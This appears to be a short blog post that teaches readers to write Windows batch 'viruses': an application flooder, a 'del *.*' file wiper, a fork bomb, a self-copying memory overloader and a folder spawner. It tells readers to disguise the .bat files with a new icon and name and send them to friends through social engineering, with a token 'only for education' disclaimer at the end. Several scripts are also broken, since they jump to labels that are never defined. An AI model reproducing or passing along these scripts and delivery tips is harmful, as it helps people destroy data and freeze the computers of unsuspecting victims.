Computer Viruses

 Hello friends,
                           Today I am going to tell you some computer viruses,  That can do a lot of loss in your victim's computer (like wipe out memory removes all the contents in victim's computer). Follow below points to create viruses......
 First open your notepad or any text editor in your desktop and you can write any computer virus code given below. There are following some viruses code :

1. Application flooder virus

@echo off
start cmd
start write
start notepad
start explorer
start calc
goto hey

 2. Wipe out memory

 @echo off
del *.*

3. Virus fork

start %0
goto s

4. Memory overload virus

@echo off
set x=%random%
set %0 > %x%.bat
start %x%
goto start

5. Folder blaster virus

@echo off
cd ./Desktop
md 1
md 2
md 3
md 4
md 5
md 6
md 7
md 8
md 9
md 0
start 1
start 2
start 3
start 4
start 5
start 6
start 7
start 8
start 9
start 0
goto loop
                                   After typing these of above one code in notepad or any text editor save the code as .bat  file extension . Now you can edit its logo  and name etc. in your desktop on right click of your mouse on going properties. Now your virus is ready to run and do destructive in your victim device. send this to your friend using social engineering or any social media platform. 
             Thanks a lot for reading my blog, Like and follow my blog for further updates.
 Note: Only for education.


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